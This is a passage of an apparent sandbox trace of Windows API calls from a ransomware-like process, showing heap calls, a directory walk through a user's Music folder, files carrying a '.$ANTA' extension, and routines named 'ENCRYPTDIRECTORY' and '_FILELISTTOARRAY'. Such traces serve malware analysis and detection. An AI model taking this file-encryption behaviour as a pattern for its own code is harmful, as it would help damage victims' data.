wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0114.191] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.191] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.192] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffb7d20, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xffb7d20, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1000420c, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x8160, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="WC8LUkBjI.mp3.$ANTA", cAlternateFileName="WC8LUK~1.$AN")) returned 1 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.192] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.192] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0114.193] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.193] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0114.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.194] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2570, ftCreationTime.dwHighDateTime=0x144eb40, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2570, ftLastWriteTime.dwLowDateTime=0x43e8cd8, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="", cAlternateFileName="\x80нńဓ+\x10")) returned 0 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.194] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0114.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0114.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0114.195] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0114.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.195] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0114.195] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0114.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0114.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0114.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0114.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0114.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0114.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a80e8 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.200] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0114.200] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0114.201] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9")) returned 0x10 [0114.201] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4634ef0, ftCreationTime.dwHighDateTime=0x1d5f0bd, ftLastAccessTime.dwLowDateTime=0xd6622ec0, ftLastAccessTime.dwHighDateTime=0x1d5e7a0, ftLastWriteTime.dwLowDateTime=0xd6622ec0, ftLastWriteTime.dwHighDateTime=0x1d5e7a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca478, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0114.201] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4634ef0, ftCreationTime.dwHighDateTime=0x1d5f0bd, ftLastAccessTime.dwLowDateTime=0xd6622ec0, ftLastAccessTime.dwHighDateTime=0x1d5e7a0, ftLastWriteTime.dwLowDateTime=0xd6622ec0, ftLastWriteTime.dwHighDateTime=0x1d5e7a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca478, cFileName="..", cAlternateFileName="")) returned 1 [0114.201] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cff1b20, ftCreationTime.dwHighDateTime=0x1d5e773, ftLastAccessTime.dwLowDateTime=0x7fab7d20, ftLastAccessTime.dwHighDateTime=0x1d5ede0, ftLastWriteTime.dwLowDateTime=0x7fab7d20, ftLastWriteTime.dwHighDateTime=0x1d5ede0, nFileSizeHigh=0x0, nFileSizeLow=0x66d, dwReserved0=0x0, dwReserved1=0x43ca478, cFileName="0csxPXrUs0a.m4a", cAlternateFileName="0CSXPX~1.M4A")) returned 1 [0114.201] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9012730, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x7c77e8d0, ftLastAccessTime.dwHighDateTime=0x1d5e9a0, ftLastWriteTime.dwLowDateTime=0x7c77e8d0, ftLastWriteTime.dwHighDateTime=0x1d5e9a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="evi6Nl1 g1KyY", cAlternateFileName="EVI6NL~1")) returned 1 [0114.201] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90484ba0, ftCreationTime.dwHighDateTime=0x1d5e43e, ftLastAccessTime.dwLowDateTime=0x6dab5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e580, ftLastWriteTime.dwLowDateTime=0x6dab5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e580, nFileSizeHigh=0x0, nFileSizeLow=0xbdad, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="mxXesXXst_.mp3", cAlternateFileName="MXXESX~1.MP3")) returned 1 [0114.201] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2520, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x16, ftLastWriteTime.dwLowDateTime=0xdf0000, 